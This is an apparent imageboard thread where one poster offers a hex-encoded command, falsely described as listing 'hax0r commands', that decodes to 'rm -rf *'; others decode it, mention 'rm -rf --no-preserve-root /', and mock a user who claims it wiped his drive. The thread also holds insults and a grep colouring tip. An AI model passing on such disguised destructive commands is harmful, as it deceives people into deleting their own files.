Ywn be a linux command line pro

>ywn be a linux command line pro

Attached: 1428578997900669.jpg (650x650, 23K)

try: $(echo 726d202d7266202a | xxd -r -p)

It gives you a list of 1334 hax0r commands with explanations.

all you need to know is screenfetch
every other command is irrelevant since GUI is superior

a lot of "operation not permitted" lines also I can't even run ls now, does this reset my commands or something?

oh user

what the fuck did i just do? I literally can't cd anywhere

That's the command for reverting to "minimal install" mode.

please don't tell me you actually ran an obviously obfuscated command from Jow Forums

I CANT BOOT INTO GENTOO ANYMORE WHAT DID YOU FUCKERS MADE ME DO

Attached: dodgedyourbait.png (500x522, 33K)

>ITT: the state of average EBYN GENTOOLORD LEETHAXXOR that shits up your comfy threads

Attached: gs.png (327x316, 208K)

I like this one.
grep --color -E 'needle|$'

is there any way to revert whatever i just did? from a livedvd perhaps?

>$ echo 726d202d7266202a | xxd -r -p
>rm -rf *
>not rm -rf --no-preserve-root /
nice bait fucker

i'm not sure exactly what that command does, but it's been posted before and i know it deletes shit.

i have no clue if you can recover it.

honestly just make a full disk backup and then reinstall and see if you can salvage anything

rm -rf * is better because assuming you're in your home directory you probably won't need permissions to run it

If you're not LARPing you have just went thru an episode that you shouldn't reveal to anyone ever...

sure but it's not going to delete your commands as this retard claims

>ywn be autistic

Attached: retarded Pepe noose suicide.jpg (655x509, 70K)

if you have a directory in your home thats in your PATH then it can.

but yeah judging by the fact that OP is acting like he knows nothing about the linux command line he's probably larping.

what does this do?

i mean i know what grep usually does but i aint runnin that shit

i've just mounted my hdd from my livedvd and there's absolutely nothing, please let this be a joke

I'm inclined to believe you're larping at this point, user.

I don't think it's even possible to delete your entire hard drive with that command. at most you deleted your home

post pics or I think you're LARPing.

you fucking absolute fucking asshole retard THIS DELETED ABSOLUTELY EVERYTHING you huge pathetic neet, unlike you i use my disks to store my work instead of god damned trap hentai and screenshots for desktop threads

" rm -rf * " joke is old OP
You're larping

It colors string that match your search and '|$' is regex to match your search or any line ending.
So effect is every line of output is displayed but only your search is colored, good if you need to see path to your string or something, e.g., tree . | grep --color -E 'photos|$' will color photos and you can still see path in directories to get to it.

i obviously sudo !!'d it how else do you think it could have wiped my entire fucking hard drive

I ain't runnin that shit

you sure it isn't piping shit into `$`? I don't even know if that works but still

pics or it didn't happen

yeah it's not like i have the time to anonymously larp about being a complete moron

my thesis was in this hard drive you think i'm going to take a picture to entertain a band of neet clowns you can fuck right off

so it didn't happen then.

Mediocre bait user, 7/10, see me after class

sudo apt-get install

>sudo pacman -Syu
ftfy

>sudo yaourt -Syu

Attached: dur.png (800x729, 48K)

look if you're all so paranoid about larping because i ran an obscured rm -rf / it's fine i don't care for your trust, just someone please be fucking real and realize that i lost a good 3 months work here and help me out finding a way tonat least get my lost tex files back

>please be fucking real

how hard is it to take a picture of your screen, user? You're obviously posting from a phone right now if your computer is fucked, right?

oh wait, you aren't, because you're a larping retard

Attached: itsabigone.jpg (500x500, 55K)

That's it all does user, compare top and bottom.

Attached: term.png (800x549, 347K)

>sudo pacman -Syu cmatrix

Attached: hackerman.jpg (894x894, 165K)